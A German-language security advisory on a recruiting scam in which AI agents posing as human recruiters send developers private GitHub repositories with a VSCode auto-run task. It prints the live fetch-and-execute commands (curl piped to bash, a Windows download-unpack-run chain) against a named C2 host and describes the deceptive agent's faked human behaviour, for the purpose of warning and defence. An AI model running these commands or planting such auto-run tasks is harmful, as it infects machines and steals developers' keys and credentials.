# KI-Agenten im Stellenbetrug: Wie sie über private Repositories infiltrieren
Betrüger nutzen inzwischen KI-Agenten, um Angriffe auf Entwickler über Plattformen wie Habr Career zu automatisieren. Statt manueller Nachrichten erhalten Tausende von Bewerbern personalisierte Stellenangebote mit Testaufgaben, die versteckten schädlichen Code enthalten. Der Hauptangriffsvektor sind private GitHub-Repositories mit automatisch startenden Aufgaben in VSCode.
So funktioniert das neue Angriffsschema
Der Angreifer richtet ein Konto auf einer Recruiting-Plattform ein und konfiguriert einen KI-Agenten, der Entwicklerprofile parst. Basierend auf dem Tech-Stack (z. B. React + Node.js + Web3) erzeugt er eine überzeugende Stellenbeschreibung und führt ein Gespräch, das einem echten HR-Mitarbeiter nachahmt. Der Agent vermeidet sofortige Antworten, macht „menschliche“ Tippfehler und kommuniziert nur während der Geschäftszeiten – alles, um Vertrauen aufzubauen.
Nachdem der Bewerber der Testaufgabe zugestimmt hat, wird er zu einem privaten Repository auf GitHub hinzugefügt. Das ist entscheidend: Öffentliche Repositories werden schnell von Sicherheits-Scannern erkannt, private bleiben unter dem Radar, bis sie geklont werden.
Versteckte Payload in .vscode/
Im Repository findet sich eine Standard-Fullstack-Struktur: React-Frontend, Express-Backend, PostgreSQL-Datenbank, Firebase-Authentifizierung, Stripe-Integration. Der Code wirkt auf den ersten Blick legitim. Der schädliche Bestandteil ist jedoch im Verzeichnis .vscode/ versteckt.
Die Datei tasks.json enthält eine Aufgabe mit dem Parameter:
"runOn": "folderOpen"
Dieser sorgt dafür, dass VSCode den Befehl automatisch ausführt, sobald der Projektordner geöffnet wird. Eine Benachrichtigung erscheint unten im Interface, aber die meisten Entwickler ignorieren sie, da solche Aufgaben für Builds üblich sind.
Die Befehle variieren je nach Betriebssystem:
Linux / macOS:
curl -fsSL -A 101 https://ping-i2eo.onrender.com/nvs | bash
Windows:
curl -sk -A 100 -o %TEMP%\i.ini https://ping-i2eo.onrender.com/nvs
.\ .vscode\snippets\argv.exe x -ppppppp %TEMP%\i.ini -o%TEMP%
wscript.exe %TEMP%\vs9extensions\update.vbs
Komponenten der schädlichen Infrastruktur
Der Angriff nutzt mehrere technische Elemente:
- C2-Server:
ping-i2eo.onrender.com, gehostet auf dem kostenlosen Render.com. Der/nvs-Endpunkt liefert ein dynamisches Shell-Skript. Der User-Agent (100,101,102) identifiziert das Opfer-OS. - Binärdatei
argv.exe: PE32-Datei (579 KB) in.vscode/snippets/, die eine verschlüsselte Payload auf Windows entpackt. - Obfuskierter JS: Datei
.vscode/lock(753 KB) mit einzeiligem JavaScript, wahrscheinlich für Persistenz oder Datendiebstahl in Unix-Umgebungen. - Falsche Zugangsdaten:
server/config/default.jsonenthält echte API-Keys im Klartext (Cloudflare, S3/R2, E-Mail), um dem Projekt Glaubwürdigkeit zu verleihen.
Ziele des Angriffs und Folgen
Die genaue Payload ist unbekannt, da sie dynamisch vom C2-Server geladen wird. Typische Ziele umfassen jedoch:
- Stehlen von SSH-Keys aus
~/.ssh/ - Extrahieren von
.env-Dateien und Tokens aus anderen Projekten - Übernehmen von Browser-Cookies und gespeicherten Passwörtern
- Installieren eines Cryptominers
- Einpflanzen eines Backdoors oder Reverse Shells für dauerhaften Zugriff
Web3-Entwickler sind besonders gefährdet: Ihre Maschinen enthalten oft Seed-Phrasen, Private Keys und Wallets mit direktem Zugriff auf Krypto-Assets.
Warum der Angriff diesmal scheiterte
Zwei Faktoren verhinderten die Infektion:
- VSCode-Einstellung
task.allowAutomaticTasks: off– blockiert die automatische Ausführung von Workspace-Aufgaben vollständig ohne explizite Bestätigung. - Öffnen des Repositories im WSL-Terminal, nicht in der GUI-Version von VSCode. Der Parameter
runOn: folderOpenlöst nur aus, wenn der Ordner über die Desktop-App geöffnet wird.
Warnsignale bei Kontakten mit Recruitern
Achten Sie auf diese Warnsignale:
- KI, die einen Menschen simuliert: Absichtliche Tippfehler, Antworten nur während Geschäftszeiten, Ausweichen vor Details. Anfragen nach Projektdetails ergeben vage, vorgefertigte „Startup-Schmiere“.
- Übermäßig präzise Stellenpersonalisierung, die genau zu Ihrem Stack passt, besonders von einem Account mit geringer Aktivität.
- Privates Repository für die Testaufgabe ohne Vorschau-Option für den Code.
- Vorhandensein von
.vscode/tasks.jsonmit"runOn": "folderOpen"– legitime Testaufgaben brauchen keine automatisch startenden Skripte.
Wichtige Erkenntnisse
- Deaktivieren Sie die automatische Aufgaben-Ausführung in VSCode: Gehen Sie zu Einstellungen → suchen Sie nach
task.allowAutomaticTasks→ setzen Sie aufoff. - Überprüfen Sie immer den Repository-Inhalt im GitHub-Webinterface, bevor Sie klonen, besonders
.vscode/-Dateien. - Vertrauen Sie privaten Repositories nicht blind – sie werden häufig genutzt, um Malware-Erkennungssysteme zu umgehen.
- Web3-Entwickler sind Top-Ziele: Isolieren Sie Wallets und Keys von Ihrem Haupt-Workspace.
- KI-Agenten senken Betrugskosten: Ein System kann Tausende Profile bearbeiten und massenhaft personalisierte Angriffe ermöglichen.
— Editorial Team
Noch keine Kommentare.